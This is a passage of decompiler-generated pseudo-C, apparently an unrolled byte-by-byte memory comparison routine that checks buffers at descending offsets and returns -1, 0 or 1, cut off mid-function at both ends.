																				_t1270 = ( *(_t1354 - 0xa) & 0x000000ff) - ( *(_t1340 - 0xa) & 0x000000ff);
																				__eflags = _t1270;
																				if(_t1270 != 0) {
																					__eflags = _t1270;
																					_t367 = _t1270 > 0;
																					__eflags = _t367;
																					_t1270 = (0 | _t367) * 2 - 1;
																				}
																				__eflags = _t1270;
																				if(_t1270 == 0) {
																					_t1270 = ( *(_t1354 - 9) & 0x000000ff) - ( *(_t1340 - 9) & 0x000000ff);
																					__eflags = _t1270;
																					if(_t1270 != 0) {
																						__eflags = _t1270;
																						_t373 = _t1270 > 0;
																						__eflags = _t373;
																						_t1270 = (0 | _t373) * 2 - 1;
																					}
																					__eflags = _t1270;
																					if(_t1270 == 0) {
																						goto L201;
																					}
																				}
																			}
																		}
																	}
																	goto L228;
																case 0xd:
																	L281:
																	__eax =  *(__esi - 0xd);
																	__eflags =  *(__esi - 0xd) -  *(__edx - 0xd);
																	if( *(__esi - 0xd) ==  *(__edx - 0xd)) {
																		goto L294;
																	} else {
																		__ecx = __al & 0x000000ff;
																		__eax =  *(__edx - 0xd) & 0x000000ff;
																		__ecx = (__al & 0x000000ff) - ( *(__edx - 0xd) & 0x000000ff);
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			__eax = 0;
																			__eflags = __ecx;
																			_t531 = __ecx > 0;
																			__eflags = _t531;
																			__eax = 0 | _t531;
																			__ecx = _t531 * 2 - 1;
																		}
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			goto L228;
																		} else {
																			__ecx =  *(__esi - 0xc) & 0x000000ff;
																			__eax =  *(__edx - 0xc) & 0x000000ff;
																			__ecx = ( *(__esi - 0xc) & 0x000000ff) - ( *(__edx - 0xc) & 0x000000ff);
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				__eax = 0;
																				__eflags = __ecx;
																				_t537 = __ecx > 0;
																				__eflags = _t537;
																				__eax = 0 | _t537;
																				__ecx = _t537 * 2 - 1;
																			}
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				goto L228;
																			} else {
																				__ecx =  *(__esi - 0xb) & 0x000000ff;
																				__eax =  *(__edx - 0xb) & 0x000000ff;
																				__ecx = ( *(__esi - 0xb) & 0x000000ff) - ( *(__edx - 0xb) & 0x000000ff);
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					__eax = 0;
																					__eflags = __ecx;
																					_t543 = __ecx > 0;
																					__eflags = _t543;
																					__eax = 0 | _t543;
																					__ecx = _t543 * 2 - 1;
																				}
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					goto L228;
																				} else {
																					__ecx =  *(__esi - 0xa) & 0x000000ff;
																					__eax =  *(__edx - 0xa) & 0x000000ff;
																					__ecx = ( *(__esi - 0xa) & 0x000000ff) - ( *(__edx - 0xa) & 0x000000ff);
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						__eax = 0;
																						__eflags = __ecx;
																						_t549 = __ecx > 0;
																						__eflags = _t549;
																						__eax = 0 | _t549;
																						__ecx = _t549 * 2 - 1;
																					}
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						goto L228;
																					} else {
																						goto L294;
																					}
																				}
																			}
																		}
																	}
																	goto L528;
																case 0xe:
																	L374:
																	__eax =  *(__esi - 0xe);
																	__eflags =  *(__esi - 0xe) -  *(__edx - 0xe);
																	if( *(__esi - 0xe) ==  *(__edx - 0xe)) {
																		goto L387;
																	} else {
																		__ecx = __al & 0x000000ff;
																		__eax =  *(__edx - 0xe) & 0x000000ff;
																		__ecx = (__al & 0x000000ff) - ( *(__edx - 0xe) & 0x000000ff);
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			__eax = 0;
																			__eflags = __ecx;
																			_t713 = __ecx > 0;
																			__eflags = _t713;
																			__eax = 0 | _t713;
																			__ecx = _t713 * 2 - 1;
																		}
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			goto L228;
																		} else {
																			__ecx =  *(__esi - 0xd) & 0x000000ff;
																			__eax =  *(__edx - 0xd) & 0x000000ff;
																			__ecx = ( *(__esi - 0xd) & 0x000000ff) - ( *(__edx - 0xd) & 0x000000ff);
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				__eax = 0;
																				__eflags = __ecx;
																				_t719 = __ecx > 0;
																				__eflags = _t719;
																				__eax = 0 | _t719;
																				__ecx = _t719 * 2 - 1;
																			}
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				goto L228;
																			} else {
																				__ecx =  *(__esi - 0xc) & 0x000000ff;
																				__eax =  *(__edx - 0xc) & 0x000000ff;
																				__ecx = ( *(__esi - 0xc) & 0x000000ff) - ( *(__edx - 0xc) & 0x000000ff);
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					__eax = 0;
																					__eflags = __ecx;
																					_t725 = __ecx > 0;
																					__eflags = _t725;
																					__eax = 0 | _t725;
																					__ecx = _t725 * 2 - 1;
																				}
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					goto L228;
																				} else {
																					__ecx =  *(__esi - 0xb) & 0x000000ff;
																					__eax =  *(__edx - 0xb) & 0x000000ff;
																					__ecx = ( *(__esi - 0xb) & 0x000000ff) - ( *(__edx - 0xb) & 0x000000ff);
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						__eax = 0;
																						__eflags = __ecx;
																						_t731 = __ecx > 0;
																						__eflags = _t731;
																						__eax = 0 | _t731;
																						__ecx = _t731 * 2 - 1;
																					}
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						goto L228;
																					} else {
																						goto L387;
																					}
																				}
																			}
																		}
																	}
																	goto L528;
																case 0xf:
																	L467:
																	__eax =  *(__esi - 0xf);
																	__eflags =  *(__esi - 0xf) -  *(__edx - 0xf);
																	if( *(__esi - 0xf) ==  *(__edx - 0xf)) {
																		goto L480;
																	} else {
																		__ecx = __al & 0x000000ff;
																		__eax =  *(__edx - 0xf) & 0x000000ff;
																		__ecx = (__al & 0x000000ff) - ( *(__edx - 0xf) & 0x000000ff);
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			__eax = 0;
																			__eflags = __ecx;
																			_t892 = __ecx > 0;
																			__eflags = _t892;
																			__eax = 0 | _t892;
																			__ecx = _t892 * 2 - 1;
																		}
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			goto L228;
																		} else {
																			__ecx =  *(__esi - 0xe) & 0x000000ff;
																			__eax =  *(__edx - 0xe) & 0x000000ff;
																			__ecx = ( *(__esi - 0xe) & 0x000000ff) - ( *(__edx - 0xe) & 0x000000ff);
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				__eax = 0;
																				__eflags = __ecx;
																				_t898 = __ecx > 0;
																				__eflags = _t898;
																				__eax = 0 | _t898;
																				__ecx = _t898 * 2 - 1;
																			}
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				goto L228;
																			} else {
																				__ecx =  *(__esi - 0xd) & 0x000000ff;
																				__eax =  *(__edx - 0xd) & 0x000000ff;
																				__ecx = ( *(__esi - 0xd) & 0x000000ff) - ( *(__edx - 0xd) & 0x000000ff);
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					__eax = 0;
																					__eflags = __ecx;
																					_t904 = __ecx > 0;
																					__eflags = _t904;
																					__eax = 0 | _t904;
																					__ecx = _t904 * 2 - 1;
																				}
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					goto L228;
																				} else {
																					__ecx =  *(__esi - 0xc) & 0x000000ff;
																					__eax =  *(__edx - 0xc) & 0x000000ff;
																					__ecx = ( *(__esi - 0xc) & 0x000000ff) - ( *(__edx - 0xc) & 0x000000ff);
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						__eax = 0;
																						__eflags = __ecx;
																						_t910 = __ecx > 0;
																						__eflags = _t910;
																						__eax = 0 | _t910;
																						__ecx = _t910 * 2 - 1;
																					}
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						goto L228;
																					} else {
																						goto L480;
																					}
																				}
																			}
																		}
																	}
																	goto L528;
																case 0x10:
																	L175:
																	_t1060 =  *(_t1354 - 0x10);
																	__eflags = _t1060 -  *(_t1340 - 0x10);
																	if(_t1060 ==  *(_t1340 - 0x10)) {
																		goto L188;
																	} else {
																		_t1270 = (_t1060 & 0x000000ff) - ( *(_t1340 - 0x10) & 0x000000ff);
																		__eflags = _t1270;
																		if(_t1270 != 0) {
																			__eflags = _t1270;
																			_t330 = _t1270 > 0;
																			__eflags = _t330;
																			_t1270 = (0 | _t330) * 2 - 1;
																		}
																		__eflags = _t1270;
																		if(_t1270 == 0) {
																			_t1270 = ( *(_t1354 - 0xf) & 0x000000ff) - ( *(_t1340 - 0xf) & 0x000000ff);
																			__eflags = _t1270;
																			if(_t1270 != 0) {
																				__eflags = _t1270;
																				_t336 = _t1270 > 0;
																				__eflags = _t336;
																				_t1270 = (0 | _t336) * 2 - 1;
																			}
																			__eflags = _t1270;
																			if(_t1270 == 0) {
																				_t1270 = ( *(_t1354 - 0xe) & 0x000000ff) - ( *(_t1340 - 0xe) & 0x000000ff);
																				__eflags = _t1270;
																				if(_t1270 != 0) {
																					__eflags = _t1270;
																					_t342 = _t1270 > 0;
																					__eflags = _t342;
																					_t1270 = (0 | _t342) * 2 - 1;
																				}
																				__eflags = _t1270;
																				if(_t1270 == 0) {
																					_t1270 = ( *(_t1354 - 0xd) & 0x000000ff) - ( *(_t1340 - 0xd) & 0x000000ff);
																					__eflags = _t1270;
																					if(_t1270 != 0) {
																						__eflags = _t1270;
																						_t348 = _t1270 > 0;
																						__eflags = _t348;
																						_t1270 = (0 | _t348) * 2 - 1;
																					}
																					__eflags = _t1270;
																					if(_t1270 == 0) {
																						goto L188;
																					}
																				}
																			}
																		}
																	}
																	goto L228;
																case 0x11:
																	L268:
																	__eax =  *(__esi - 0x11);
																	__eflags =  *(__esi - 0x11) -  *(__edx - 0x11);
																	if( *(__esi - 0x11) ==  *(__edx - 0x11)) {
																		goto L281;
																	} else {
																		__ecx = __al & 0x000000ff;
																		__eax =  *(__edx - 0x11) & 0x000000ff;
																		__ecx = (__al & 0x000000ff) - ( *(__edx - 0x11) & 0x000000ff);
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			__eax = 0;
																			__eflags = __ecx;
																			_t506 = __ecx > 0;
																			__eflags = _t506;
																			__eax = 0 | _t506;
																			__ecx = _t506 * 2 - 1;
																		}
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			goto L228;
																		} else {
																			__ecx =  *(__esi - 0x10) & 0x000000ff;
																			__eax =  *(__edx - 0x10) & 0x000000ff;
																			__ecx = ( *(__esi - 0x10) & 0x000000ff) - ( *(__edx - 0x10) & 0x000000ff);
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				__eax = 0;
																				__eflags = __ecx;
																				_t512 = __ecx > 0;
																				__eflags = _t512;
																				__eax = 0 | _t512;
																				__ecx = _t512 * 2 - 1;
																			}
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				goto L228;
																			} else {
																				__ecx =  *(__esi - 0xf) & 0x000000ff;
																				__eax =  *(__edx - 0xf) & 0x000000ff;
																				__ecx = ( *(__esi - 0xf) & 0x000000ff) - ( *(__edx - 0xf) & 0x000000ff);
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					__eax = 0;
																					__eflags = __ecx;
																					_t518 = __ecx > 0;
																					__eflags = _t518;
																					__eax = 0 | _t518;
																					__ecx = _t518 * 2 - 1;
																				}
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					goto L228;
																				} else {
																					__ecx =  *(__esi - 0xe) & 0x000000ff;
																					__eax =  *(__edx - 0xe) & 0x000000ff;
																					__ecx = ( *(__esi - 0xe) & 0x000000ff) - ( *(__edx - 0xe) & 0x000000ff);
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						__eax = 0;
																						__eflags = __ecx;
																						_t524 = __ecx > 0;
																						__eflags = _t524;
																						__eax = 0 | _t524;
																						__ecx = _t524 * 2 - 1;
																					}
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						goto L228;
																					} else {
																						goto L281;
																					}
																				}
																			}
																		}
																	}
																	goto L528;
																case 0x12:
																	L361:
																	__eax =  *(__esi - 0x12);
																	__eflags =  *(__esi - 0x12) -  *(__edx - 0x12);
																	if( *(__esi - 0x12) ==  *(__edx - 0x12)) {
																		goto L374;
																	} else {
																		__ecx = __al & 0x000000ff;
																		__eax =  *(__edx - 0x12) & 0x000000ff;
																		__ecx = (__al & 0x000000ff) - ( *(__edx - 0x12) & 0x000000ff);
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			__eax = 0;
																			__eflags = __ecx;
																			_t688 = __ecx > 0;
																			__eflags = _t688;
																			__eax = 0 | _t688;
																			__ecx = _t688 * 2 - 1;
																		}
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			goto L228;
																		} else {
																			__ecx =  *(__esi - 0x11) & 0x000000ff;
																			__eax =  *(__edx - 0x11) & 0x000000ff;
																			__ecx = ( *(__esi - 0x11) & 0x000000ff) - ( *(__edx - 0x11) & 0x000000ff);
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				__eax = 0;
																				__eflags = __ecx;
																				_t694 = __ecx > 0;
																				__eflags = _t694;
																				__eax = 0 | _t694;
																				__ecx = _t694 * 2 - 1;
																			}
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				goto L228;
																			} else {
																				__ecx =  *(__esi - 0x10) & 0x000000ff;
																				__eax =  *(__edx - 0x10) & 0x000000ff;
																				__ecx = ( *(__esi - 0x10) & 0x000000ff) - ( *(__edx - 0x10) & 0x000000ff);
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					__eax = 0;
																					__eflags = __ecx;
																					_t700 = __ecx > 0;
																					__eflags = _t700;
																					__eax = 0 | _t700;
																					__ecx = _t700 * 2 - 1;
																				}
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					goto L228;
																				} else {
																					__ecx =  *(__esi - 0xf) & 0x000000ff;
																					__eax =  *(__edx - 0xf) & 0x000000ff;
																					__ecx = ( *(__esi - 0xf) & 0x000000ff) - ( *(__edx - 0xf) & 0x000000ff);
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						__eax = 0;
																						__eflags = __ecx;
																						_t706 = __ecx > 0;
																						__eflags = _t706;
																						__eax = 0 | _t706;
																						__ecx = _t706 * 2 - 1;
																					}
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						goto L228;
																					} else {
																						goto L374;
																					}
																				}
																			}
																		}
																	}
																	goto L528;
																case 0x13:
																	L454:
																	__eax =  *(__esi - 0x13);
																	__eflags =  *(__esi - 0x13) -  *(__edx - 0x13);
																	if( *(__esi - 0x13) ==  *(__edx - 0x13)) {
																		goto L467;
																	} else {
																		__eax =  *(__edx - 0x13) & 0x000000ff;
																		__ecx =  *(__esi - 0x13) & 0x000000ff;
																		__ecx = ( *(__esi - 0x13) & 0x000000ff) - ( *(__edx - 0x13) & 0x000000ff);
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			__eax = 0;
																			__eflags = __ecx;
																			_t867 = __ecx > 0;
																			__eflags = _t867;
																			__eax = 0 | _t867;
																			__ecx = _t867 * 2 - 1;
																		}
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			goto L228;
																		} else {
																			__ecx =  *(__esi - 0x12) & 0x000000ff;
																			__eax =  *(__edx - 0x12) & 0x000000ff;
																			__ecx = ( *(__esi - 0x12) & 0x000000ff) - ( *(__edx - 0x12) & 0x000000ff);
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				__eax = 0;
																				__eflags = __ecx;
																				_t873 = __ecx > 0;
																				__eflags = _t873;
																				__eax = 0 | _t873;
																				__ecx = _t873 * 2 - 1;
																			}
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				goto L228;
																			} else {
																				__ecx =  *(__esi - 0x11) & 0x000000ff;
																				__eax =  *(__edx - 0x11) & 0x000000ff;
																				__ecx = ( *(__esi - 0x11) & 0x000000ff) - ( *(__edx - 0x11) & 0x000000ff);
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					__eax = 0;
																					__eflags = __ecx;
																					_t879 = __ecx > 0;
																					__eflags = _t879;
																					__eax = 0 | _t879;
																					__ecx = _t879 * 2 - 1;
																				}
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					goto L228;
																				} else {
																					__ecx =  *(__esi - 0x10) & 0x000000ff;
																					__eax =  *(__edx - 0x10) & 0x000000ff;
																					__ecx = ( *(__esi - 0x10) & 0x000000ff) - ( *(__edx - 0x10) & 0x000000ff);
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						__eax = 0;
																						__eflags = __ecx;
																						_t885 = __ecx > 0;
																						__eflags = _t885;
																						__eax = 0 | _t885;
																						__ecx = _t885 * 2 - 1;
																					}
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						goto L228;
																					} else {
																						goto L467;
																					}
																				}
																			}
																		}
																	}
																	goto L528;
																case 0x14:
																	L162:
																	_t1059 =  *(_t1354 - 0x14);
																	__eflags = _t1059 -  *(_t1340 - 0x14);
																	if(_t1059 ==  *(_t1340 - 0x14)) {
																		goto L175;
																	} else {
																		_t1270 = (_t1059 & 0x000000ff) - ( *(_t1340 - 0x14) & 0x000000ff);
																		__eflags = _t1270;
																		if(_t1270 != 0) {
																			__eflags = _t1270;
																			_t305 = _t1270 > 0;
																			__eflags = _t305;
																			_t1270 = (0 | _t305) * 2 - 1;
																		}
																		__eflags = _t1270;
																		if(_t1270 == 0) {
																			_t1270 = ( *(_t1354 - 0x13) & 0x000000ff) - ( *(_t1340 - 0x13) & 0x000000ff);
																			__eflags = _t1270;
																			if(_t1270 != 0) {
																				__eflags = _t1270;
																				_t311 = _t1270 > 0;
																				__eflags = _t311;
																				_t1270 = (0 | _t311) * 2 - 1;
																			}
																			__eflags = _t1270;
																			if(_t1270 == 0) {
																				_t1270 = ( *(_t1354 - 0x12) & 0x000000ff) - ( *(_t1340 - 0x12) & 0x000000ff);
																				__eflags = _t1270;
																				if(_t1270 != 0) {
																					__eflags = _t1270;
																					_t317 = _t1270 > 0;
																					__eflags = _t317;
																					_t1270 = (0 | _t317) * 2 - 1;
																				}
																				__eflags = _t1270;
																				if(_t1270 == 0) {
																					_t1270 = ( *(_t1354 - 0x11) & 0x000000ff) - ( *(_t1340 - 0x11) & 0x000000ff);
																					__eflags = _t1270;
																					if(_t1270 != 0) {
																						__eflags = _t1270;
																						_t323 = _t1270 > 0;
																						__eflags = _t323;
																						_t1270 = (0 | _t323) * 2 - 1;
																					}
																					__eflags = _t1270;
																					if(_t1270 == 0) {
																						goto L175;
																					}
																				}
																			}
																		}
																	}
																	goto L228;
																case 0x15:
																	L255:
																	__eax =  *(__esi - 0x15);
																	__eflags =  *(__esi - 0x15) -  *(__edx - 0x15);
																	if( *(__esi - 0x15) ==  *(__edx - 0x15)) {
																		goto L268;
																	} else {
																		__ecx = __al & 0x000000ff;
																		__eax =  *(__edx - 0x15) & 0x000000ff;
																		__ecx = (__al & 0x000000ff) - ( *(__edx - 0x15) & 0x000000ff);
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			__eax = 0;
																			__eflags = __ecx;
																			_t481 = __ecx > 0;
																			__eflags = _t481;
																			__eax = 0 | _t481;
																			__ecx = _t481 * 2 - 1;
																		}
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			goto L228;
																		} else {
																			__ecx =  *(__esi - 0x14) & 0x000000ff;
																			__eax =  *(__edx - 0x14) & 0x000000ff;
																			__ecx = ( *(__esi - 0x14) & 0x000000ff) - ( *(__edx - 0x14) & 0x000000ff);
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				__eax = 0;
																				__eflags = __ecx;
																				_t487 = __ecx > 0;
																				__eflags = _t487;
																				__eax = 0 | _t487;
																				__ecx = _t487 * 2 - 1;
																			}
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				goto L228;
																			} else {
																				__ecx =  *(__esi - 0x13) & 0x000000ff;
																				__eax =  *(__edx - 0x13) & 0x000000ff;
																				__ecx = ( *(__esi - 0x13) & 0x000000ff) - ( *(__edx - 0x13) & 0x000000ff);
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					__eax = 0;
																					__eflags = __ecx;
																					_t493 = __ecx > 0;
																					__eflags = _t493;
																					__eax = 0 | _t493;
																					__ecx = _t493 * 2 - 1;
																				}
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					goto L228;
																				} else {
																					__ecx =  *(__esi - 0x12) & 0x000000ff;
																					__eax =  *(__edx - 0x12) & 0x000000ff;
																					__ecx = ( *(__esi - 0x12) & 0x000000ff) - ( *(__edx - 0x12) & 0x000000ff);
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						__eax = 0;
																						__eflags = __ecx;
																						_t499 = __ecx > 0;
																						__eflags = _t499;
																						__eax = 0 | _t499;
																						__ecx = _t499 * 2 - 1;
																					}
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						goto L228;
																					} else {
																						goto L268;
																					}
																				}
																			}
																		}
																	}
																	goto L528;
																case 0x16:
																	L348:
																	__eax =  *(__esi - 0x16);
																	__eflags =  *(__esi - 0x16) -  *(__edx - 0x16);
																	if( *(__esi - 0x16) ==  *(__edx - 0x16)) {
																		goto L361;
																	} else {
																		__ecx = __al & 0x000000ff;
																		__eax =  *(__edx - 0x16) & 0x000000ff;
																		__ecx = (__al & 0x000000ff) - ( *(__edx - 0x16) & 0x000000ff);
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			__eax = 0;
																			__eflags = __ecx;
																			_t663 = __ecx > 0;
																			__eflags = _t663;
																			__eax = 0 | _t663;
																			__ecx = _t663 * 2 - 1;
																		}
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			goto L228;
																		} else {
																			__ecx =  *(__esi - 0x15) & 0x000000ff;
																			__eax =  *(__edx - 0x15) & 0x000000ff;
																			__ecx = ( *(__esi - 0x15) & 0x000000ff) - ( *(__edx - 0x15) & 0x000000ff);
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				__eax = 0;
																				__eflags = __ecx;
																				_t669 = __ecx > 0;
																				__eflags = _t669;
																				__eax = 0 | _t669;
																				__ecx = _t669 * 2 - 1;
																			}
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				goto L228;
																			} else {
																				__ecx =  *(__esi - 0x14) & 0x000000ff;
																				__eax =  *(__edx - 0x14) & 0x000000ff;
																				__ecx = ( *(__esi - 0x14) & 0x000000ff) - ( *(__edx - 0x14) & 0x000000ff);
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					__eax = 0;
																					__eflags = __ecx;
																					_t675 = __ecx > 0;
																					__eflags = _t675;
																					__eax = 0 | _t675;
																					__ecx = _t675 * 2 - 1;
																				}
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					goto L228;
																				} else {
																					__ecx =  *(__esi - 0x13) & 0x000000ff;
																					__eax =  *(__edx - 0x13) & 0x000000ff;
																					__ecx = ( *(__esi - 0x13) & 0x000000ff) - ( *(__edx - 0x13) & 0x000000ff);
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						__eax = 0;
																						__eflags = __ecx;
																						_t681 = __ecx > 0;
																						__eflags = _t681;
																						__eax = 0 | _t681;
																						__ecx = _t681 * 2 - 1;
																					}
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						goto L228;
																					} else {
																						goto L361;
																					}
																				}
																			}
																		}
																	}
																	goto L528;
																case 0x17:
																	L441:
																	__eax =  *(__esi - 0x17);
																	__eflags =  *(__esi - 0x17) -  *(__edx - 0x17);
																	if( *(__esi - 0x17) ==  *(__edx - 0x17)) {
																		goto L454;
																	} else {
																		__ecx = __al & 0x000000ff;
																		__eax =  *(__edx - 0x17) & 0x000000ff;
																		__ecx = (__al & 0x000000ff) - ( *(__edx - 0x17) & 0x000000ff);
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			__eax = 0;
																			__eflags = __ecx;
																			_t841 = __ecx > 0;
																			__eflags = _t841;
																			__eax = 0 | _t841;
																			__ecx = _t841 * 2 - 1;
																		}
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			goto L228;
																		} else {
																			__ecx =  *(__esi - 0x16) & 0x000000ff;
																			__eax =  *(__edx - 0x16) & 0x000000ff;
																			__ecx = ( *(__esi - 0x16) & 0x000000ff) - ( *(__edx - 0x16) & 0x000000ff);
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				__eax = 0;
																				__eflags = __ecx;
																				_t847 = __ecx > 0;
																				__eflags = _t847;
																				__eax = 0 | _t847;
																				__ecx = _t847 * 2 - 1;
																			}
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				goto L228;
																			} else {
																				__ecx =  *(__esi - 0x15) & 0x000000ff;
																				__eax =  *(__edx - 0x15) & 0x000000ff;
																				__ecx = ( *(__esi - 0x15) & 0x000000ff) - ( *(__edx - 0x15) & 0x000000ff);
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					__eax = 0;
																					__eflags = __ecx;
																					_t853 = __ecx > 0;
																					__eflags = _t853;
																					__eax = 0 | _t853;
																					__ecx = _t853 * 2 - 1;
																				}
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					goto L228;
																				} else {
																					__ecx =  *(__esi - 0x14) & 0x000000ff;
																					__eax =  *(__edx - 0x14) & 0x000000ff;
																					__ecx = ( *(__esi - 0x14) & 0x000000ff) - ( *(__edx - 0x14) & 0x000000ff);
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						__eax = 0;
																						__eflags = __ecx;
																						_t859 = __ecx > 0;
																						__eflags = _t859;
																						__eax = 0 | _t859;
																						__ecx = _t859 * 2 - 1;
																					}
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						goto L228;
																					} else {
																						goto L454;
																					}
																				}
																			}
																		}
																	}
																	goto L528;
																case 0x18:
																	L149:
																	_t1058 =  *(_t1354 - 0x18);
																	__eflags = _t1058 -  *(_t1340 - 0x18);
																	if(_t1058 ==  *(_t1340 - 0x18)) {
																		goto L162;
																	} else {
																		_t1270 = (_t1058 & 0x000000ff) - ( *(_t1340 - 0x18) & 0x000000ff);
																		__eflags = _t1270;
																		if(_t1270 != 0) {
																			__eflags = _t1270;
																			_t280 = _t1270 > 0;
																			__eflags = _t280;
																			_t1270 = (0 | _t280) * 2 - 1;
																		}
																		__eflags = _t1270;
																		if(_t1270 == 0) {
																			_t1270 = ( *(_t1354 - 0x17) & 0x000000ff) - ( *(_t1340 - 0x17) & 0x000000ff);
																			__eflags = _t1270;
																			if(_t1270 != 0) {
																				__eflags = _t1270;
																				_t286 = _t1270 > 0;
																				__eflags = _t286;
																				_t1270 = (0 | _t286) * 2 - 1;
																			}
																			__eflags = _t1270;
																			if(_t1270 == 0) {
																				_t1270 = ( *(_t1354 - 0x16) & 0x000000ff) - ( *(_t1340 - 0x16) & 0x000000ff);
																				__eflags = _t1270;
																				if(_t1270 != 0) {
																					__eflags = _t1270;
																					_t292 = _t1270 > 0;
																					__eflags = _t292;
																					_t1270 = (0 | _t292) * 2 - 1;
																				}
																				__eflags = _t1270;
																				if(_t1270 == 0) {
																					_t1270 = ( *(_t1354 - 0x15) & 0x000000ff) - ( *(_t1340 - 0x15) & 0x000000ff);
																					__eflags = _t1270;
																					if(_t1270 != 0) {
																						__eflags = _t1270;
																						_t298 = _t1270 > 0;
																						__eflags = _t298;
																						_t1270 = (0 | _t298) * 2 - 1;
																					}
																					__eflags = _t1270;
																					if(_t1270 == 0) {
																						goto L162;
																					}
																				}
																			}
																		}
																	}
																	goto L228;
																case 0x19:
																	L242:
																	__eax =  *(__esi - 0x19);
																	__eflags =  *(__esi - 0x19) -  *(__edx - 0x19);
																	if( *(__esi - 0x19) ==  *(__edx - 0x19)) {
																		goto L255;
																	} else {
																		__eax =  *(__edx - 0x19) & 0x000000ff;
																		__ecx =  *(__esi - 0x19) & 0x000000ff;
																		__ecx = ( *(__esi - 0x19) & 0x000000ff) - ( *(__edx - 0x19) & 0x000000ff);
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			__eax = 0;
																			__eflags = __ecx;
																			_t456 = __ecx > 0;
																			__eflags = _t456;
																			__eax = 0 | _t456;
																			__ecx = _t456 * 2 - 1;
																		}
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			goto L228;
																		} else {
																			__ecx =  *(__esi - 0x18) & 0x000000ff;
																			__eax =  *(__edx - 0x18) & 0x000000ff;
																			__ecx = ( *(__esi - 0x18) & 0x000000ff) - ( *(__edx - 0x18) & 0x000000ff);
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				__eax = 0;
																				__eflags = __ecx;
																				_t462 = __ecx > 0;
																				__eflags = _t462;
																				__eax = 0 | _t462;
																				__ecx = _t462 * 2 - 1;
																			}
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				goto L228;
																			} else {
																				__ecx =  *(__esi - 0x17) & 0x000000ff;
																				__eax =  *(__edx - 0x17) & 0x000000ff;
																				__ecx = ( *(__esi - 0x17) & 0x000000ff) - ( *(__edx - 0x17) & 0x000000ff);
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					__eax = 0;
																					__eflags = __ecx;
																					_t468 = __ecx > 0;
																					__eflags = _t468;
																					__eax = 0 | _t468;
																					__ecx = _t468 * 2 - 1;
																				}
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					goto L228;
																				} else {
																					__ecx =  *(__esi - 0x16) & 0x000000ff;
																					__eax =  *(__edx - 0x16) & 0x000000ff;
																					__ecx = ( *(__esi - 0x16) & 0x000000ff) - ( *(__edx - 0x16) & 0x000000ff);
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						__eax = 0;
																						__eflags = __ecx;
																						_t474 = __ecx > 0;
																						__eflags = _t474;
																						__eax = 0 | _t474;
																						__ecx = _t474 * 2 - 1;
																					}
																					__eflags = __ecx;
